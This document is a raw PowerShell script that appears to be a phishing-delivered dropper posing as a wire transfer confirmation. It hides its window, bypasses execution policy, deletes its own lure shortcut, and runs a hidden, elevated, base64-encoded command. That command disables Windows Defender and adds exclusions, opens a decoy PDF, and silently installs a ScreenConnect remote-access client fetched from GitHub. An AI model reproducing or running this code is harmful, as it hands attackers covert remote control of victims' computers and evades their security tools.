$ErrorActionPreference   = "SilentlyContinue"
$WarningPreference       = "SilentlyContinue"
$VerbosePreference       = "SilentlyContinue"
$ProgressPreference      = "SilentlyContinue"

Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force

Add-Type -Name Window -Namespace Console -MemberDefinition @'
    [DllImport("Kernel32.dll")]
    public static extern IntPtr GetConsoleWindow();

    [DllImport("user32.dll")]
    public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);
'@

$ConsoleWin = [Console.Window]::GetConsoleWindow()
[Console.Window]::ShowWindow($ConsoleWin, 0)

$CurrentDir = (Get-Location).Path
$ClientName = $($k9568=60;$b=[byte[]](0x4B,0x55,0x4E,0x59,0x63,0x5F,0x53,0x52,0x5A,0x55,0x4E,0x51,0x5D,0x48,0x55,0x53,0x52,0x6C,0x78,0x7A);-join($b|%{[char]($_ -bxor$k9568)}))

$InkPath = Join-Path $CurrentDir ($ClientName + ".lnk")
if ([System.IO.File]::Exists($InkPath)) {
    try { [System.IO.File]::Delete($InkPath) } catch {
        $dir  = [System.IO.Path]::GetDirectoryName($InkPath)
        $name = [System.IO.Path]::GetFileNameWithoutExtension($InkPath)
        $ext  = [System.IO.Path]::GetExtension($InkPath)
        $c = 1
        do { $np = [System.IO.Path]::Combine($dir, "$name($c)$ext"); $c++ } while ([System.IO.File]::Exists($np))
        try { [System.IO.File]::Move($InkPath, $np) } catch { }
    }
}

Start-Process powershell.exe -Verb RunAs -WindowStyle Hidden -ArgumentList '-NoProfile -ExecutionPolicy Bypass -EncodedCommand JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyACAALQBiAG8AcgAgAFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAzAAoAdAByAHkAewBTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBEAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAAMQAgAC0AZQBhACAAMAB9AGMAYQB0AGMAaAB7AH0ACgB0AHIAeQB7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgAC0AZQBhACAAMAB9AGMAYQB0AGMAaAB7AH0ACgB0AHIAeQB7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwArACcAXABTAGMAcgBlAGUAbgBDAG8AbgBuAGUAYwB0ACAAQwBsAGkAZQBuAHQAKgAnACkAIAAtAGUAYQAgADAAfQBjAGEAdABjAGgAewB9AAoAdAByAHkAewBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBtAHMAaQBlAHgAZQBjAC4AZQB4AGUAJwAgAC0AZQBhACAAMAB9AGMAYQB0AGMAaAB7AH0ACgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAE0AaQBsAGwAaQBzAGUAYwBvAG4AZABzACAANQAwADAACgAkAHAAZABmAD0ASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACcAdwBpAHIAZQBfAGMAbwBuAGYAaQByAG0AYQB0AGkAbwBuAFAARABGAC4AcABkAGYAJwAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwB0AG8AYwBrAGwAZQB5ADEAMgAvAHcAaQByAGUALQBkAG8AYwBzAC8AbQBhAGkAbgAvAHcAaQByAGUAXwBjAG8AbgBmAGkAcgBtAGEAdABpAG8AbgAuAHAAZABmACcAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAZABmACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AZQBhACAAMAAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAHAAZABmACAALQBlAGEAIAAwAAoAJABtAHMAaQA9AEoAbwBpAG4ALQBQAGEAdABoACAAJABlAG4AdgA6AFQARQBNAFAAIAAoAFsASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApACsAJwAuAG0AcwBpACcAKQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AcwB0AG8AYwBrAGwAZQB5ADEAMgAvAHcAaQByAGUALQBkAG8AYwBzAC8AcgBlAGwAZQBhAHMAZQBzAC8AZABvAHcAbgBsAG8AYQBkAC8AdgAxAC4AMAAvAFMAYwByAGUAZQBuAEMAbwBuAG4AZQBjAHQALgBDAGwAaQBlAG4AdABTAGUAdAB1AHAALgBtAHMAaQAnACAALQBPAHUAdABGAGkAbABlACAAJABtAHMAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAGUAYQAgADAACgBVAG4AYgBsAG8AYwBrAC0ARgBpAGwAZQAgAC0AUABhAHQAaAAgACQAbQBzAGkAIAAtAGUAYQAgADAACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAbQBzAGkAZQB4AGUAYwAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALwBpACAAYAAiACQAbQBzAGkAYAAiACAALwBxAG4AIAAvAG4AbwByAGUAcwB0AGEAcgB0ACIAIAAtAFcAYQBpAHQAIAAtAGUAYQAgADAACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAG0AcwBpACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAACgB0AHIAeQB7AFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEQAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIAAwACAALQBlAGEAIAAwAH0AYwBhAHQAYwBoAHsAfQA='
